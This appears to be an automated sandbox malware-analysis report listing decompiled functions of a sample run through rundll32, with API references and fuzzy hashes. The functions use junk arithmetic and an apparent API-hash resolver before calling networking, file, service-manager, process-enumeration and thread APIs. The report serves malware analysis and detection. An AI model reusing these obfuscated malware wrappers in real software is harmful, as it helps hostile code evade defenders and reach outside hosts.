                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp Download File
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: NextProcess32
                                                                                                                                • String ID: SM2j
                                                                                                                                • API String ID: 1850201408-3232349684
                                                                                                                                • Opcode ID: 876c2141c2e661c6b44c41ceee14b4604e578ba9fb82596e1e3333c5e09ef1ca
                                                                                                                                • Instruction ID: 312fd154dcb6d74c0b50277b2edb5fed6df0ef92cd43ce07160bf960fa19554c
                                                                                                                                • Opcode Fuzzy Hash: 876c2141c2e661c6b44c41ceee14b4604e578ba9fb82596e1e3333c5e09ef1ca
                                                                                                                                • Instruction Fuzzy Hash: 3CF03C75801218BBDF19DFA4DD4A8DEBF79EB00310F208199EC19AB261D7B65B50AB90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00F59289, Relevance: 1.6, APIs: 1, Instructions: 62networkCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 33%
                                                                                                                                			E00F59289(long __ecx, void* __edx, intOrPtr _a8, WCHAR* _a12, intOrPtr _a20, void* _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, WCHAR* _a52) {
				signed int _v8;
				signed int _v12;
				void* _t35;
				void* _t44;
				signed int _t46;
				long _t55;

				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_push(0);
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(0);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__ecx);
				E00F4BB26(_t35);
				_v8 = 0x7a40;
				_t46 = 0x7b;
				_t17 = _t46 + 0x29; // 0xa4
				_v8 = _v8 / _t46;
				_v8 = _v8 * 0x3d;
				_v8 = _v8 * 0x54;
				_v8 = _v8 ^ 0x0013a359;
				_v12 = 0x4ef4;
				_v12 = _v12 | 0xfbc47bc3;
				_v12 = _v12 ^ 0xfbc459ee;
				E00F5915E(_t17, 0xd4e42328, 0x699633b1);
				_t44 = HttpOpenRequestW(_a28, _a52, _a12, 0, 0, 0, _t55, 0); // executed
				return _t44;
			}









                                                                                                                                0x00f5928c
                                                                                                                                0x00f5928d
                                                                                                                                0x00f59292
                                                                                                                                0x00f59294
                                                                                                                                0x00f59295
                                                                                                                                0x00f59298
                                                                                                                                0x00f5929b
                                                                                                                                0x00f5929e
                                                                                                                                0x00f592a1
                                                                                                                                0x00f592a4
                                                                                                                                0x00f592a7
                                                                                                                                0x00f592aa
                                                                                                                                0x00f592ab
                                                                                                                                0x00f592ae
                                                                                                                                0x00f592af
                                                                                                                                0x00f592b2
                                                                                                                                0x00f592b5
                                                                                                                                0x00f592b7
                                                                                                                                0x00f592b8
                                                                                                                                0x00f592bd
                                                                                                                                0x00f592cb
                                                                                                                                0x00f592d1
                                                                                                                                0x00f592d4
                                                                                                                                0x00f592e5
                                                                                                                                0x00f592ec
                                                                                                                                0x00f592ef
                                                                                                                                0x00f592f6
                                                                                                                                0x00f592fd
                                                                                                                                0x00f59304
                                                                                                                                0x00f59311
                                                                                                                                0x00f59327
                                                                                                                                0x00f5932e

                                                                                                                                APIs
                                                                                                                                • HttpOpenRequestW.WININET(3F91AD12,346AC6FB,?,00000000,00000000,00000000,03849AC0,00000000), ref: 00F59327
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp Download File
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: HttpOpenRequest
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1984915467-0
                                                                                                                                • Opcode ID: 4319b0463a4fc2bc923d5790b4d62b29149974737dd154d41e00b651d945fa70
                                                                                                                                • Instruction ID: 47775123b6d0f9282f9cd3dcadda0d9a44388925199b53d72705f4b418b34c84
                                                                                                                                • Opcode Fuzzy Hash: 4319b0463a4fc2bc923d5790b4d62b29149974737dd154d41e00b651d945fa70
                                                                                                                                • Instruction Fuzzy Hash: 52110632801248FBDF15CF92DD0ACDFBF79EB89710F508159F90862120D3769A61EB50
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00F587B3, Relevance: 1.6, APIs: 1, Instructions: 53networkCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 35%
                                                                                                                                			E00F587B3(void* __ecx, void* __edx, long _a4, void* _a8, WCHAR* _a20, signed int _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52) {
				signed int _v8;
				void* _t32;
				short _t40;

				_t40 = _a28;
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_t40 & 0x0000ffff);
				_push(0);
				_push(_a20);
				_push(0);
				_push(0);
				_push(_a8);
				_push(_a4);
				E00F4BB26(_t40 & 0x0000ffff);
				_a28 = 0x6caf;
				_a28 = _a28 + 0xae90;
				_a28 = _a28 ^ 0x047ea52a;
				_a28 = _a28 ^ 0x047fb6d5;
				_v8 = 0x6aa5;
				_v8 = _v8 + 0xffffe3fe;
				_v8 = _v8 ^ 0x000066a8;
				E00F5915E(0xf3, 0x5d16645c, 0x699633b1);
				_t32 = InternetConnectW(_a8, _a20, _t40, 0, 0, _a4, 0, 0); // executed
				return _t32;
			}






                                                                                                                                0x00f587b8
                                                                                                                                0x00f587bc
                                                                                                                                0x00f587c4
                                                                                                                                0x00f587c5
                                                                                                                                0x00f587c8
                                                                                                                                0x00f587cb
                                                                                                                                0x00f587ce
                                                                                                                                0x00f587d1
                                                                                                                                0x00f587d2
                                                                                                                                0x00f587d3
                                                                                                                                0x00f587d6
                                                                                                                                0x00f587d7
                                                                                                                                0x00f587d8
                                                                                                                                0x00f587db
                                                                                                                                0x00f587e0
                                                                                                                                0x00f587e5
                                                                                                                                0x00f587ef
                                                                                                                                0x00f587fb
                                                                                                                                0x00f58802
                                                                                                                                0x00f58809
                                                                                                                                0x00f58810
                                                                                                                                0x00f58817
                                                                                                                                0x00f5882e
                                                                                                                                0x00f58844
                                                                                                                                0x00f5884b

                                                                                                                                APIs
                                                                                                                                • InternetConnectW.WININET(?,?,3F91AD12,00000000,00000000,?,00000000,00000000), ref: 00F58844
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp Download File
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: ConnectInternet
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3050416762-0
                                                                                                                                • Opcode ID: e73e0751d0cf8b9f94db98a6de33b63938227a77f19ecab0cf615805a1cd11a9
                                                                                                                                • Instruction ID: de5e6c3c76f9312423b276029bf8af3930aa3f7cd706396cdd30969e8fadd1bc
                                                                                                                                • Opcode Fuzzy Hash: e73e0751d0cf8b9f94db98a6de33b63938227a77f19ecab0cf615805a1cd11a9
                                                                                                                                • Instruction Fuzzy Hash: E911E872400188BBEF119E96CC09CEF3F79EBC9768F414248FD4866120D376DA24EBA1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00F54330, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,000011A2,010512CF), ref: 00F543C4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp Download File
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: InformationVolume
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2039140958-0
                                                                                                                                • Opcode ID: 853bbbaac74536f122fd52fe8a738f5108b7cf8b532cec8be3e45c95b75b05b2
                                                                                                                                • Instruction ID: e0f49f61f9850de8af8ba85cd1b437e23acc1f161f390e4fb533e04ac6924ab5
                                                                                                                                • Opcode Fuzzy Hash: 853bbbaac74536f122fd52fe8a738f5108b7cf8b532cec8be3e45c95b75b05b2
                                                                                                                                • Instruction Fuzzy Hash: 8A11CE72802268FBDF659F91DD49CDF7E79EF0A2A4F504044BA0922120D3768A60EBA1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00F44A84, Relevance: 1.6, APIs: 1, Instructions: 52fileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 47%
                                                                                                                                			E00F44A84(long __ecx, void* __edx, long _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, WCHAR* _a24, long _a28, intOrPtr _a32, long _a36) {
				signed int _v8;
				signed int _v12;
				struct _SECURITY_ATTRIBUTES* _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				void* _t35;
				long _t40;

				_t40 = __ecx;
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__ecx);
				E00F4BB26(_t29);
				_v28 = 0x1f9dbe;
				_v24 = 0xc8df6;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0xe92e;
				_v12 = _v12 * 0x28;
				_v12 = _v12 ^ 0x002460dc;
				_v8 = 0x4fd2;
				_v8 = _v8 | 0x7ddf2b24;
				_v8 = _v8 ^ 0x7ddf4bdc;
				E00F5915E(0x20a, 0xd56ccf6d, 0xf90a85c5);
				_t35 = CreateFileW(_a24, _t40, _a8, 0, _a36, _a28, 0); // executed
				return _t35;
			}












                                                                                                                                0x00f44a8e
                                                                                                                                0x00f44a90
                                                                                                                                0x00f44a91
                                                                                                                                0x00f44a94
                                                                                                                                0x00f44a97
                                                                                                                                0x00f44a9a
                                                                                                                                0x00f44a9d
                                                                                                                                0x00f44aa0
                                                                                                                                0x00f44aa3
                                                                                                                                0x00f44aa6
                                                                                                                                0x00f44aa9
                                                                                                                                0x00f44aab
                                                                                                                                0x00f44aac
                                                                                                                                0x00f44ab1
                                                                                                                                0x00f44abb
                                                                                                                                0x00f44ac7
                                                                                                                                0x00f44aca
                                                                                                                                0x00f44acd
                                                                                                                                0x00f44ae2
                                                                                                                                0x00f44ae5
                                                                                                                                0x00f44aec
                                                                                                                                0x00f44af3
                                                                                                                                0x00f44afa
                                                                                                                                0x00f44b07
                                                                                                                                0x00f44b1e
                                                                                                                                0x00f44b25

                                                                                                                                APIs
                                                                                                                                • CreateFileW.KERNEL32(2829A97E,00000001,?,00000000,?,00000000,00000000), ref: 00F44B1E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp Download File
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 823142352-0
                                                                                                                                • Opcode ID: 6adaf1209f7bf945a7181296bc6131e9dd0e40351077341de236bae8549b8559
                                                                                                                                • Instruction ID: bda0be95eb7fd0c1093b6e04310902e6dab5f21afe7d8d1f6a19dd606f8c046e
                                                                                                                                • Opcode Fuzzy Hash: 6adaf1209f7bf945a7181296bc6131e9dd0e40351077341de236bae8549b8559
                                                                                                                                • Instruction Fuzzy Hash: FA111372801209BBCF069FD5CD49CDEBFB9EF88310F118189FA1462221D3768A61EB91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00F4A681, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 68%
                                                                                                                                			E00F4A681(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, int _a16) {
				signed int _v8;
				signed int _v12;
				void* _t33;
				void* _t43;
				signed int _t45;
				signed int _t46;

				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				E00F4BB26(_t33);
				_v12 = 0x5706;
				_v12 = _v12 << 8;
				_t45 = 0x58;
				_v12 = _v12 / _t45;
				_v12 = _v12 ^ 0x0000a367;
				_v8 = 0x9ddb;
				_v8 = _v8 + 0x5c6;
				_v8 = _v8 >> 6;
				_t46 = 0x4e;
				_v8 = _v8 / _t46;
				_v8 = _v8 ^ 0x0000134e;
				E00F5915E(0x1d9, 0x6abbc736, 0x4454fbab);
				_t43 = OpenSCManagerW(0, 0, _a16); // executed
				return _t43;
			}









                                                                                                                                0x00f4a687
                                                                                                                                0x00f4a68c
                                                                                                                                0x00f4a68f
                                                                                                                                0x00f4a690
                                                                                                                                0x00f4a694
                                                                                                                                0x00f4a695
                                                                                                                                0x00f4a69a
                                                                                                                                0x00f4a6a3
                                                                                                                                0x00f4a6ac
                                                                                                                                0x00f4a6b1
                                                                                                                                0x00f4a6bc
                                                                                                                                0x00f4a6c3
                                                                                                                                0x00f4a6ca
                                                                                                                                0x00f4a6d1
                                                                                                                                0x00f4a6d8
                                                                                                                                0x00f4a6e3
                                                                                                                                0x00f4a6e6
                                                                                                                                0x00f4a6fd
                                                                                                                                0x00f4a70a
                                                                                                                                0x00f4a710

                                                                                                                                APIs
                                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 00F4A70A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp Download File
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: ManagerOpen
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1889721586-0
                                                                                                                                • Opcode ID: d203dab8b0b05960c36d205f664f3b1ea026a5ba8fdb8b54a0a6e037f7478e59
                                                                                                                                • Instruction ID: 043e9377b481e5ba77b44c92ee568d749c9058d1a41789bf1046c031fb8bd92a
                                                                                                                                • Opcode Fuzzy Hash: d203dab8b0b05960c36d205f664f3b1ea026a5ba8fdb8b54a0a6e037f7478e59
                                                                                                                                • Instruction Fuzzy Hash: 8E112372A01208FBEB14CF95DD498CEBFB5EB45314F108089E90867280D7B95B60AB90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00F53FE4, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 73%
                                                                                                                                			E00F53FE4(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, struct tagPROCESSENTRY32W* _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				void* _t41;
				void* _t51;
				signed int _t53;
				signed int _t54;
				signed int _t55;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E00F4BB26(_t41);
				_v20 = _v20 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v24 = 0x57769e;
				_v12 = 0xf966;
				_t53 = 0x16;
				_v12 = _v12 / _t53;
				_v12 = _v12 ^ 0x00006aa1;
				_v8 = 0x861b;
				_v8 = _v8 << 7;
				_t54 = 0x6d;
				_v8 = _v8 / _t54;
				_t55 = 0x53;
				_t33 = _t55 + 0x7b; // 0xce
				_v8 = _v8 / _t55;
				_v8 = _v8 ^ 0x000006cc;
				_t51 = E00F5915E(_t33, 0x7b8bbe67, 0xf90a85c5);
				Process32FirstW(_a8, _a12); // executed
				return _t51;
			}













                                                                                                                                0x00f53fea
                                                                                                                                0x00f53fed
                                                                                                                                0x00f53ff0
                                                                                                                                0x00f53ff3
                                                                                                                                0x00f53ff6
                                                                                                                                0x00f53ff8
                                                                                                                                0x00f53ffd
                                                                                                                                0x00f54003
                                                                                                                                0x00f54007
                                                                                                                                0x00f5400e
                                                                                                                                0x00f5401a
                                                                                                                                0x00f5401f
                                                                                                                                0x00f54024
                                                                                                                                0x00f5402b
                                                                                                                                0x00f54032
                                                                                                                                0x00f54039
                                                                                                                                0x00f5403e
                                                                                                                                0x00f54046
                                                                                                                                0x00f5404c
                                                                                                                                0x00f5404f
                                                                                                                                0x00f54052
                                                                                                                                0x00f54069
                                                                                                                                0x00f54077
                                                                                                                                0x00f5407c

                                                                                                                                APIs
                                                                                                                                • Process32FirstW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,839BC4E5), ref: 00F54077
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp Download File
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FirstProcess32
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2623510744-0
                                                                                                                                • Opcode ID: 7a2e86987826a3f7980d72e901c2664314dcde1ee0692125ebe5669abf9fef80
                                                                                                                                • Instruction ID: 5d14271e3fa31d8e310893a413aef6b4b6c7499fc6dea9dde1ae1be8d4d8aab5
                                                                                                                                • Opcode Fuzzy Hash: 7a2e86987826a3f7980d72e901c2664314dcde1ee0692125ebe5669abf9fef80
                                                                                                                                • Instruction Fuzzy Hash: 39111C72D00208FBDF04DFE4C909ADEBBB2EB44314F20C099E9146B255D7B69B24AB51
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00F5A025, Relevance: 1.5, APIs: 1, Instructions: 46memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 21%
                                                                                                                                			E00F5A025(long __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				signed int _v8;
				signed int _v12;
				void* _t27;
				void* _t34;
				signed int _t36;
				void* _t40;
				long _t42;
				long _t45;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t42 = __edx;
				_t45 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00F4BB26(_t27);
				_v8 = 0xf7d3;
				_t36 = 0x27;
				_v8 = _v8 / _t36;
				_v8 = _v8 + 0x97d6;
				_v8 = _v8 + 0xe2e2;
				_v8 = _v8 ^ 0x0001f2e2;
				_v12 = 0x1c50;
				_v12 = _v12 + 0xffffe0b3;
				_v12 = _v12 + 0xffff6834;
				_v12 = _v12 ^ 0xffff1da8;
				_push(0xf90a85c5);
				_push(0xfcf1db7b);
				_t40 = 0x48;
				E00F5915E(_t40);
				_t34 = RtlAllocateHeap(_a12, _t42, _t45); // executed
				return _t34;
			}











                                                                                                                                0x00f5a028
                                                                                                                                0x00f5a029
                                                                                                                                0x00f5a02c
                                                                                                                                0x00f5a02f
                                                                                                                                0x00f5a031
                                                                                                                                0x00f5a033
                                                                                                                                0x00f5a036
                                                                                                                                0x00f5a039
                                                                                                                                0x00f5a03a
                                                                                                                                0x00f5a03b
                                                                                                                                0x00f5a040
                                                                                                                                0x00f5a04e
                                                                                                                                0x00f5a054
                                                                                                                                0x00f5a057
                                                                                                                                0x00f5a05e
                                                                                                                                0x00f5a065
                                                                                                                                0x00f5a06c
                                                                                                                                0x00f5a073
                                                                                                                                0x00f5a07a
                                                                                                                                0x00f5a081
                                                                                                                                0x00f5a08e
                                                                                                                                0x00f5a093
                                                                                                                                0x00f5a09a
                                                                                                                                0x00f5a09b
                                                                                                                                0x00f5a0a8
                                                                                                                                0x00f5a0af

                                                                                                                                APIs
                                                                                                                                • RtlAllocateHeap.NTDLL(?,0000CB58,3EFFABFF,?,?,?,?,000014CE), ref: 00F5A0A8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp Download File
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocateHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                • Opcode ID: fcb23a4921863ba7656f297d00ef9158a0502676cff695b8d934dd5012400d04
                                                                                                                                • Instruction ID: 80975676b61bba4499476c1eb6a7b1eed2c26f6672e31789201997ce5dc86a92
                                                                                                                                • Opcode Fuzzy Hash: fcb23a4921863ba7656f297d00ef9158a0502676cff695b8d934dd5012400d04
                                                                                                                                • Instruction Fuzzy Hash: 48016972901308BBDB14CF95CD49C8EBB78EF81320F208098F908622A0E7B94B509B50
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00F57F4D, Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 34%
                                                                                                                                			E00F57F4D(_Unknown_base(*)()* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a28, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				void* _t19;
				void* _t24;
				_Unknown_base(*)()* _t32;

				_push(__ecx);
				_push(__ecx);
				_push(_a36);
				_t32 = __ecx;
				_push(0);
				_push(_a28);
				_push(0);
				_push(0);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00F4BB26(_t19);
				_v12 = 0x1df8;
				_v12 = _v12 + 0xffff3b42;
				_v12 = _v12 ^ 0xffff4a91;
				_v8 = 0xe7e1;
				_v8 = _v8 + 0x695e;
				_v8 = _v8 ^ 0x00014092;
				E00F5915E(0xf4, 0x65775614, 0xf90a85c5);
				_t24 = CreateThread(0, 0, _t32, _a12, 0, 0); // executed
				return _t24;
			}








                                                                                                                                0x00f57f50
                                                                                                                                0x00f57f51
                                                                                                                                0x00f57f54
                                                                                                                                0x00f57f59
                                                                                                                                0x00f57f5b
                                                                                                                                0x00f57f5c
                                                                                                                                0x00f57f5f
                                                                                                                                0x00f57f60
                                                                                                                                0x00f57f61
                                                                                                                                0x00f57f62
                                                                                                                                0x00f57f65
                                                                                                                                0x00f57f68
                                                                                                                                0x00f57f6c
                                                                                                                                0x00f57f6d
                                                                                                                                0x00f57f72
                                                                                                                                0x00f57f7c
                                                                                                                                0x00f57f88
                                                                                                                                0x00f57f8f
                                                                                                                                0x00f57f96
                                                                                                                                0x00f57f9d
                                                                                                                                0x00f57fb4
                                                                                                                                0x00f57fc4
                                                                                                                                0x00f57fcb

                                                                                                                                APIs
                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A552,00F4C7B0,00000000,00000000,?,?,?,?,00000000,1FD16849,Function_0000A552,Function_0000A552,?,00F4C7B0), ref: 00F57FC4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp Download File
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                • Opcode ID: e6821cd9605109ce106dc498b339820a3e02c00524c4fc4ea37bd48af401306a
                                                                                                                                • Instruction ID: d200368ea2f4c483c1f6d98c5a3f62079e5c8e86b4c21b63eee6ef4202174de7
                                                                                                                                • Opcode Fuzzy Hash: e6821cd9605109ce106dc498b339820a3e02c00524c4fc4ea37bd48af401306a
                                                                                                                                • Instruction Fuzzy Hash: 49012CB2801249BBDF259F96CC49CEF7F79EFC9710F10415CB90866110E2765B10EBA0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00F41342, Relevance: 1.5, APIs: 1, Instructions: 44memoryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 70%
                                                                                                                                			E00F41342(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a16) {
				signed int _v8;
				signed int _v12;
				void* _t28;
				char _t36;
				signed int _t38;
				void* _t44;

				_push(_a16);
				_t44 = __edx;
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E00F4BB26(_t28);
				_v8 = 0x8780;
				_v8 = _v8 + 0xffff9f50;
				_t38 = 0x3a;
				_v8 = _v8 * 0x1a;
				_v8 = _v8 + 0x63da;
				_v8 = _v8 ^ 0x00041ec0;
				_v12 = 0xafde;
				_v12 = _v12 / _t38;
				_t20 = _t38 + 0x57; // 0x91
				_v12 = _v12 | 0x179de87f;
				_v12 = _v12 ^ 0x179d9f75;
				E00F5915E(_t20, 0x33111eaa, 0xf90a85c5);
				_t36 = RtlFreeHeap(_t44, 0, _a16); // executed
				return _t36;
			}









                                                                                                                                0x00f41348
                                                                                                                                0x00f4134b
                                                                                                                                0x00f4134d
                                                                                                                                0x00f4134f
                                                                                                                                0x00f41352
                                                                                                                                0x00f41355
                                                                                                                                0x00f41357
                                                                                                                                0x00f4135c
                                                                                                                                0x00f41365
                                                                                                                                0x00f41372
                                                                                                                                0x00f41376
                                                                                                                                0x00f41379
                                                                                                                                0x00f41380
                                                                                                                                0x00f41387
                                                                                                                                0x00f41398
                                                                                                                                0x00f4139b
                                                                                                                                0x00f4139e
                                                                                                                                0x00f413a5
                                                                                                                                0x00f413b7
                                                                                                                                0x00f413c5
                                                                                                                                0x00f413cb

                                                                                                                                APIs
                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000000,?,?,?,?,?,00009110,975475C6), ref: 00F413C5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp Download File
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                • Opcode ID: 39ce39af03f8ec80897882bdd1de28d0da040609fd36dbfefdf91bfd12370ee8
                                                                                                                                • Instruction ID: 345d185d25a353017c80466b7657df9ec1ed16b2a1c6d6c85221db729b8e6759
                                                                                                                                • Opcode Fuzzy Hash: 39ce39af03f8ec80897882bdd1de28d0da040609fd36dbfefdf91bfd12370ee8
                                                                                                                                • Instruction Fuzzy Hash: 17018871902308FBEB18DFD4DD469CEBFB5EB40324F208098F8096B251D7BA9B149B91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

